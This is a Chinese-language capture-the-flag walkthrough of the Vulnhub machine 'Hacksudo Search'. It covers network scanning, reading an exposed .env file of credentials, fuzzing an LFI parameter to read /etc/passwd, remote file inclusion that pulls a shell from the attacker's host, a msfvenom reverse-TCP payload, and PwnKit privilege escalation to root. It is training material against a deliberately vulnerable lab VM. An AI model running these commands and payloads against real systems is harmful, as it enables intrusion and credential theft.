Hacksudo Search识别目标主机IP地址

(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                                                                                                                                                                                                                     3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                             _____________________________________________________________________________   IP            At MAC Address     Count     Len  MAC Vendor / Hostname       ----------------------------------------------------------------------------- 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor                                                                                            192.168.56.100  08:00:27:f5:05:04      1      60  PCS Systemtechnik GmbH                                                                                    192.168.56.162  08:00:27:b8:ce:1e      1      60  PCS Systemtechnik GmbH     

利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.162

NMAP扫描

┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]└─$ sudo nmap -sS -sV -sC -p- 192.168.56.162 -oN nmap_full_scan Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-24 21:30 EDTNmap scan report for bogon (192.168.56.162)Host is up (0.00013s latency).Not shown: 65533 closed tcp ports (reset)PORT   STATE SERVICE VERSION22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)| ssh-hostkey: |   2048 7b:44:7c:da:fb:e5:e6:1d:76:33:eb:fa:c0:dd:77:44 (RSA)|   256 13:2d:45:07:32:83:13:eb:4e:a1:20:f4:06:ba:26:8a (ECDSA)|_  256 21:a1:86:47:07:1b:df:b2:70:7e:d9:30:e3:29:c2:e7 (ED25519)80/tcp open  http    Apache httpd 2.4.38 ((Debian))|_http-title: HacksudoSearch|_http-server-header: Apache/2.4.38 (Debian)MAC Address: 08:00:27:B8:CE:1E (Oracle VirtualBox virtual NIC)Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 10.71 seconds                                                                        

NMAP扫描结果表明目标主机有2个开放端口:22(ssh)、80(http)

获得Shell

──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]└─$ curl http://192.168.56.162/robots.txt/* find me * im number 1 search engine . just joking :) www.hacksudo.com                                                                                                                                                             ┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]└─$ nikto -h http://192.168.56.162- Nikto v2.1.6---------------------------------------------------------------------------+ Target IP:          192.168.56.162+ Target Hostname:    192.168.56.162+ Target Port:        80+ Start Time:         2023-04-24 22:26:53 (GMT-4)---------------------------------------------------------------------------+ Server: Apache/2.4.38 (Debian)+ The anti-clickjacking X-Frame-Options header is not present.+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type+ No CGI Directories found (use '-C all' to force check all possible dirs)+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.0.1".+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.+ OSVDB-3268: /account/: Directory indexing found.+ OSVDB-3092: /account/: This might be interesting...+ OSVDB-3233: /icons/README: Apache default file found.+ /.env: .env file found. The .env file may contain credentials.+ 7915 requests: 0 error(s) and 9 item(s) reported on remote host+ End Time:           2023-04-24 22:27:52 (GMT-4) (59 seconds)---------------------------------------------------------------------------+ 1 host(s) tested      *********************************************************************      Portions of the server's headers (Apache/2.4.38) are not in      the Nikto 2.1.6 database or are newer than the known string. Would you like      to submit this information (*no server specific data*) to CIRT.net      for a Nikto update (or you may email to sullo@cirt.net) (y/n)? 

nikto发现目录/account/,该目录下虽然有众多文件,但是访问这些文件,返回均为空。

nikto另外发现了/.env,

┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]└─$ curl http://192.168.56.162/.env      APP_name=HackSudoSearchAPP_ENV=localAPP_key=base64:aGFja3N1ZG8gaGVscCB5b3UgdG8gbGVhcm4gQ1RGICwgY29udGFjdCB1cyB3d3cuaGFja3N1ZG8uY29tL2NvbnRhY3QKAPP_DEBUG=falseAPP_URL=http://localhostLOG_CHANNEL=stackDB_CONNECTION=mysqlDB_HOST=127.0.0.1DB_PORT=3306DB_USERNAME=hiramanDB_PASSWORD=MyD4dSuperH3r0!

该文件包含了数据库连接用户名和密码,但是该用户名不能用于SSH

┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]└─$ ssh hiraman@192.168.56.162                                 The authenticity of host '192.168.56.162 (192.168.56.162)' can't be established.ED25519 key fingerprint is SHA256:dzS9ujCpu8ohIPbqCaxf4e6gi5YSgBrhAI8srwr1giU.This key is not known by any other namesAre you sure you want to continue connecting (yes/no/[fingerprint])? yesWarning: Permanently added '192.168.56.162' (ED25519) to the list of known hosts.hiraman@192.168.56.162's password: Permission denied, please try again.hiraman@192.168.56.162's password: 
──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]└─$ gobuster dir -u http://192.168.56.162 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.bak,.js,.sh===============================================================Gobuster v3.5by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)===============================================================[+] Url:                     http://192.168.56.162[+] Method:                  GET[+] Threads:                 10[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt[+] Negative Status codes:   404[+] User Agent:              gobuster/3.5[+] Extensions:              php,html,txt,bak,js,sh[+] Timeout:                 10s===============================================================2023/04/24 22:31:27 Starting gobuster in directory enumeration mode===============================================================/.html                (Status: 403) [Size: 279]/.php                 (Status: 403) [Size: 279]/images               (Status: 301) [Size: 317] [--> http://192.168.56.162/images/]/index.php            (Status: 200) [Size: 715]/search.php           (Status: 200) [Size: 165]/submit.php           (Status: 200) [Size: 165]/assets               (Status: 301) [Size: 317] [--> http://192.168.56.162/assets/]/account              (Status: 301) [Size: 318] [--> http://192.168.56.162/account/]/javascript           (Status: 301) [Size: 321] [--> http://192.168.56.162/javascript/]/robots.txt           (Status: 200) [Size: 75]/LICENSE              (Status: 200) [Size: 1074]/search1.php          (Status: 200) [Size: 2918]

Gobuster工具扫描出文件/search1.php,访问该文件,其中contact,作者给出提示,需要FUZZ参数,因此接下来用wfuzz工具进行FUZZING

┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]└─$ wfuzz -c -u 'http://192.168.56.162/search1.php?FUZZ=../../../../../etc/passwd' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 288 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.********************************************************* Wfuzz 3.1.0 - The Web Fuzzer                         *********************************************************Target: http://192.168.56.162/search1.php?FUZZ=../../../../../etc/passwdTotal requests: 220560=====================================================================ID           Response   Lines    Word       Chars       Payload                                                                                     =====================================================================000001129:   200        143 L    260 W      3797 Ch     "me"                         

FUZZ出参数名称为me

┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]└─$ curl http://192.168.56.162/search1.php?me=../../../../../../etc/passwd 
Home About Contact

HackSudo Search box

JumpStation The web crawler with Google

root:x:0:0:root:/root:/bin/bashdaemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologinbin:*:2:2:bin:/bin:/usr/sbin/nologinsys:*:3:3:sys:/dev:/usr/sbin/nologinsync:*:4:65534:sync:/bin:/bin/syncgames:*:5:60:games:/usr/games:/usr/sbin/nologinman:*:6:12:man:/var/cache/man:/usr/sbin/nologinlp:*:7:7:lp:/var/spool/lpd:/usr/sbin/nologinmail:*:8:8:mail:/var/mail:/usr/sbin/nologinnews:*:9:9:news:/var/spool/news:/usr/sbin/nologinuucp:*:10:10:uucp:/var/spool/uucp:/usr/sbin/nologinproxy:*:13:13:proxy:/bin:/usr/sbin/nologinwww-data:*:33:33:www-data:/var/www:/usr/sbin/nologinbackup:*:34:34:backup:/var/backups:/usr/sbin/nologinlist:*:38:38:Mailing List Manager:/var/list:/usr/sbin/nologinirc:*:39:39:ircd:/var/run/ircd:/usr/sbin/nologingnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologinnobody:*:65534:65534:nobody:/nonexistent:/usr/sbin/nologin_apt:*:100:65534::/nonexistent:/usr/sbin/nologinsystemd-timesync:*:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologinsystemd-network:*:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologinsystemd-resolve:*:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologinhacksudo:x:1000:1000:hacksudo,,,:/home/hacksudo:/bin/bashsystemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologinmessagebus:x:104:110::/nonexistent:/usr/sbin/nologinsshd:x:105:65534::/run/sshd:/usr/sbin/nologinmysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/falsemonali:x:1001:1001:,,,:/home/monali:/bin/bashjohn:x:1002:1002:,,,:/home/john:/bin/bashsearch:x:1003:1003:,,,:/home/search:/bin/bash

Visit --> www.hacksudo.com

看是否存在SSH私钥文件

http://192.168.56.162/search1.php?me=../../../../../../home/search/.ssh/id_rsa

经过测试3个普通用户均不存在ssh私钥文件。

接下来看是否有远程文件包含漏洞:

http://192.168.56.162/search1.php?me=http://192.168.56.230:8000/test.txt

经过尝试,目标存在远程文件包含漏洞,因此在Kali linux端准备好shell.php文件,并启动http.server

访问下述URL:

http://192.168.56.162/search1.php?me=http://192.168.56.230:8000/shell.php

在Kali linux上得到目标主机反弹回来的shell

┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]└─$ sudo nc -nlvp 5555                                         [sudo] password for kali: listening on [any] 5555 ...connect to [192.168.56.230] from (UNKNOWN) [192.168.56.162] 55864Linux HacksudoSearch 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64 GNU/Linux 22:00:50 up 40 min,  0 users,  load average: 0.01, 1.18, 1.25USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHATuid=33(www-data) gid=33(www-data) groups=33(www-data)/bin/sh: 0: can't access tty; job control turned off$ which python/usr/bin/python$ python -c 'import pty;pty.spawn("/bin/bash")'www-data@HacksudoSearch:/$ cd /homecd /homewww-data@HacksudoSearch:/home$ ls -alhls -alhtotal 24Kdrwxr-xr-x  6 root     root     4.0K Apr 15  2021 .drwxr-xr-x 18 root     root     4.0K Apr 11  2021 ..drwxr-x---  6 hacksudo hacksudo 4.0K Apr 15  2021 hacksudodrwxr-x---  2 john     john     4.0K Apr 13  2021 johndrwxr-x---  2 monali   monali   4.0K Apr 13  2021 monalidrwxr-x---  2 search   search   4.0K Apr 15  2021 search

提权

利用msfvenom工具生成payload,将payload上传至目标主机/tmp目录,然后执行该文件

─(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]└─$ msfvenom -p  linux/x86/meterpreter/reverse_tcp  LHOST=192.168.56.230 LPORT=6666 -f elf -o escalate.elf
msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcpmsf6 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcppayload => linux/x86/meterpreter/reverse_tcpmsf6 exploit(multi/handler) > show options Module options (exploit/multi/handler):   Name  Current Setting  Required  Description   ----  ---------------  --------  -----------Payload options (linux/x86/meterpreter/reverse_tcp):   Name   Current Setting  Required  Description   ----   ---------------  --------  -----------   LHOST                   yes       The listen address (an interface may be specified)   LPORT  4444             yes       The listen portExploit target:   Id  Name   --  ----   0   Wildcard Targetmsf6 exploit(multi/handler) > set LHOST 192.168.56.230LHOST => 192.168.56.230msf6 exploit(multi/handler) > set LPORT 6666LPORT => 6666msf6 exploit(multi/handler) > run[*] Started reverse TCP handler on 192.168.56.230:6666 [*] Sending stage (989032 bytes) to 192.168.56.162[*] Meterpreter session 1 opened (192.168.56.230:6666 -> 192.168.56.162:33994) at 2023-04-24 22:51:21 -0400meterpreter > background [*] Backgrounding session 1...msf6 exploit(multi/handler) > search suggesterMatching Modules================   #  Name                                      Disclosure Date  Rank    Check  Description   -  ----                                      ---------------  ----    -----  -----------   0  post/multi/recon/local_exploit_suggester                   normal  No     Multi Recon Local Exploit SuggesterInteract with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggestermsf6 exploit(multi/handler) > use  post/multi/recon/local_exploit_suggestermsf6 post(multi/recon/local_exploit_suggester) > show options Module options (post/multi/recon/local_exploit_suggester):   Name             Current Setting  Required  Description   ----             ---------------  --------  -----------   SESSION                           yes       The session to run this module on   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploitsmsf6 post(multi/recon/local_exploit_suggester) > set SESSION 1SESSION => 1msf6 post(multi/recon/local_exploit_suggester) > run[*] 192.168.56.162 - Collecting local exploits for x86/linux...[*] 192.168.56.162 - 167 exploit checks are being tried...[+] 192.168.56.162 - exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec: The target is vulnerable.[+] 192.168.56.162 - exploit/linux/local/pkexec: The service is running, but could not be validated.[+] 192.168.56.162 - exploit/linux/local/su_login: The target appears to be vulnerable.[*] Running check method for exploit 48 / 48[*] 192.168.56.162 - Valid modules for session 1:============================ #   Name                                                               Potentially Vulnerable?  Check Result -   ----                                                               -----------------------  ------------ 1   exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec                Yes                      The target is vulnerable. 2   exploit/linux/local/pkexec                                         Yes                      The service is running, but could not be validated. 3   exploit/linux/local/su_login                                       Yes                      The target appears to be vulnerable.

选择提权模块,然后提权

msf6 post(multi/recon/local_exploit_suggester) > use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcpmsf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > show options Module options (exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec):   Name          Current Setting  Required  Description   ----          ---------------  --------  -----------   PKEXEC_PATH                    no        The path to pkexec binary   SESSION                        yes       The session to run this module on   WRITABLE_DIR  /tmp             yes       A directory where we can write filesPayload options (linux/x64/meterpreter/reverse_tcp):   Name   Current Setting  Required  Description   ----   ---------------  --------  -----------   LHOST  10.0.2.15        yes       The listen address (an interface may be specified)   LPORT  4444             yes       The listen portExploit target:   Id  Name   --  ----   0   x86_64msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LHOST 192.168.56.230LHOST => 192.168.56.230msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LPORT 8888LPORT => 8888msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set SESSION 1SESSION => 1msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > run[*] Started reverse TCP handler on 192.168.56.230:8888 [*] Running automatic check ("set AutoCheck false" to disable)[!] Verify cleanup of /tmp/.aqmsnondyug[+] The target is vulnerable.[*] Writing '/tmp/.esjvtiaf/vswplcef/vswplcef.so' (548 bytes) ...[!] Verify cleanup of /tmp/.esjvtiaf[*] Sending stage (3020772 bytes) to 192.168.56.162[+] Deleted /tmp/.esjvtiaf/vswplcef/vswplcef.so[+] Deleted /tmp/.esjvtiaf/.qbbgfqf[+] Deleted /tmp/.esjvtiaf[*] Meterpreter session 2 opened (192.168.56.230:8888 -> 192.168.56.162:40940) at 2023-04-24 22:55:08 -0400meterpreter > shellProcess 1145 created.Channel 1 created.id uid=0(root) gid=0(root) groups=0(root),33(www-data)cd /rootlsnotes.txtroot.txtcat notes.txt _                _                  _                                 _| |__   __ _  ___| | _____ _   _  __| | ___    ___  ___  __ _ _ __ ___| |__| '_ \ / _` |/ __| |/ / __| | | |/ _` |/ _ \  / __|/ _ \/ _` | '__/ __| '_ \| | | | (_| | (__|   <\__ \ |_| | (_| | (_) | \__ \  __/ (_| | | | (__| | | ||_| |_|\__,_|\___|_|\_\___/\__,_|\__,_|\___/  |___/\___|\__,_|_|  \___|_| |_|+-------------------------------------------------------------------------+hacksudo search Box created By vishal waghmarehttps://instagram.com/realvilutry hacksudo other box1.hacksudo 1.12.hacksudo 2  3.hacksudo 34.hacksudo aliens+----------------------------------+this box name is hacksudo search.  it's my pleasure to create such box .+-----------------------------------+if any query or want any kinda support you can contact usemail: info@hacksudo.com       visal@hacksudo.comweb  : www.hacksudo.com   +----------------------------+hacksudo search vulnerability:1. LFI ssh log poisioning / RFI on search1.php2. after geting shell or you can do ls -la in /var/www/html   in .env there is password hint3. users are 3 to 4 so confused? do ssh one by one   else do hydra with given password (MyD4dSuperH3r0!)4. hacksudo ssh login done now do privileged escalation , there is searchinstall.c    searchinstall file which one have SUID permision and by read searchinstall.c    there you can read install command which is triggerd . so try path veriable    and you will get root access +++------rooted------------+++yes you roted box thats why you read thisbtw create your writeup how you solve this box and send to mei love to read your way how you solve this box+++---------+++-----------+++Signed out#vishal waghmarecat root.txt _                _                  _         ____                      _     | |__   __ _  ___| | _____ _   _  __| | ___   / ___|  ___  __ _ _ __ ___| |__  | '_ \ / _` |/ __| |/ / __| | | |/ _` |/ _ \  \___ \ / _ \/ _` | '__/ __| '_ \ | | | | (_| | (__|   <\__ \ |_| | (_| | (_) |  ___) |  __/ (_| | | | (__| | | ||_| |_|\__,_|\___|_|\_\___/\__,_|\__,_|\___/  |____/ \___|\__,_|_|  \___|_| |_|You Successfully Hackudo search box rooted!!!flag={9fb4c0afce26929041427c935c6e0879}

STRIVE FOR PROGRESS,NOT FOR PERFECTION